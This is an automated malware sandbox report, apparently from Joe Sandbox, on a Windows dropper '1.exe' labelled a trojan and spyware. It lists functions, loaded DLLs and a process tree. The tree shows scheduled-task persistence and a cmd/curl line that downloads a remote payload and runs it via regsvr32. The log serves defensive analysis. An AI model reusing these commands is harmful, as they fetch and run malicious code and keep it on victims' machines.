    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007953604_2_00795360
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007514904_2_00751490
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00781CB04_2_00781CB0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0091A0304_2_0091A030
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_009101204_2_00910120
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_009192204_2_00919220
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007E93504_2_007E9350
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007533E04_2_007533E0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_009184A04_2_009184A0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007874104_2_00787410
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007A04804_2_007A0480
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0079F5234_2_0079F523
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007825104_2_00782510
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0079A5E04_2_0079A5E0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007736704_2_00773670
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_0077D6704_2_0077D670
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_009A17104_2_009A1710
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_007987E04_2_007987E0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_009228C04_2_009228C0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00757A004_2_00757A00
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00790B104_2_00790B10
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00788C304_2_00788C30
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00791D704_2_00791D70
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00918DB04_2_00918DB0
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00784D434_2_00784D43
    Source: C:\Users\user\Desktop\1.exeCode function: 4_2_00891E504_2_00891E50
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D1158015_2_00007FF7D3D11580
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CF0CB015_2_00007FF7D3CF0CB0
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CFF48015_2_00007FF7D3CFF480
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CF7BE015_2_00007FF7D3CF7BE0
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CE8BA415_2_00007FF7D3CE8BA4
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D1E3D015_2_00007FF7D3D1E3D0
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CF729015_2_00007FF7D3CF7290
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CF222015_2_00007FF7D3CF2220
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CE721015_2_00007FF7D3CE7210
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CE8A0015_2_00007FF7D3CE8A00
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D1499015_2_00007FF7D3D14990
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D0093615_2_00007FF7D3D00936
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D008B115_2_00007FF7D3D008B1
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CEB0B015_2_00007FF7D3CEB0B0
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D8A0A015_2_00007FF7D3D8A0A0
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CF886015_2_00007FF7D3CF8860
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CF2F7015_2_00007FF7D3CF2F70
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D00E3015_2_00007FF7D3D00E30
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3D05D4015_2_00007FF7D3D05D40
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeCode function: 21_2_00007FF68E74986821_2_00007FF68E749868
    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe 916084789D8A4864E93AFF0D0C22EB56E19C201C19EA2C8601D23B5C3C345519
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00758720 appears 108 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 007587C0 appears 60 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00983F50 appears 41 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00759240 appears 244 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 008A84C0 appears 32 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 0075ADE0 appears 71 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 0097FE17 appears 55 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 008A8720 appears 64 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00763440 appears 47 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 0075A7A0 appears 63 times
    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00983394 appears 81 times
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: String function: 00007FF7D3CEC9D0 appears 63 times
    Source: 1.exeStatic PE information: invalid certificate
    Source: MainSoftware.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: MainSoftware.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Surfclub.exe.25.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.8.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Channels.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Numerics.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C8F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C859000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C843000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameShortcutFlags.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFileOperations.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C8EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CBDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CBF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Metadata.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C981000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C932000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C868000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Formats.Asn1.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.Sinks.Http.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.dll0 vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.Formatting.Compact.dllV vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C81D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.StackTrace.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs 1.exe
    Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: classification engineClassification label: mal46.troj.spyw.evad.winEXE@38/90@6/7
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008B9740 FormatMessageW,GetLastError,0_2_008B9740
    Source: C:\Program Files (x86)\Main\Chop\Install.exeCode function: 15_2_00007FF7D3CF2050 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,15_2_00007FF7D3CF2050
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008EE280 GetDiskFreeSpaceExW,0_2_008EE280
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008C0A10 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,0_2_008C0A10
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00907140 CoCreateInstance,0_2_00907140
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0075A660 LoadResource,LockResource,SizeofResource,0_2_0075A660
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\AtomixJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\AtomixJump to behavior
    Source: C:\Program Files\Surfclub\Surfclub.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5212:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\shi6FC2.tmpJump to behavior
    Source: 1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\1.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1514DFDED1D4D3DC7DCB6F08CA344BC7 C
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="5480" CHAINERUIPROCESSID="5480Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740568836 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2A686A53703CFC1ECF33E3BA90C58CFA
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B87F19D5FD070A95D977AA5C885A4C95 E Global\MSI0000
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Loop
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: unknownProcess created: C:\Program Files\Surfclub\Install.exe "C:\Program Files\Surfclub\Install.exe" install https://p1-ag5.pages.dev?source_id=1
    Source: C:\Program Files\Surfclub\Install.exeProcess created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://p1-ag5.pages.dev?source_id=1
    Source: unknownProcess created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" update
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="5480" CHAINERUIPROCESSID="5480Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740568836 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1514DFDED1D4D3DC7DCB6F08CA344BC7 CJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2A686A53703CFC1ECF33E3BA90C58CFAJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B87F19D5FD070A95D977AA5C885A4C95 E Global\MSI0000Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" PersistentJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /fJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f
    Source: C:\Program Files\Surfclub\Install.exeProcess created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://p1-ag5.pages.dev?source_id=1
    Source: C:\Users\user\Desktop\1.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
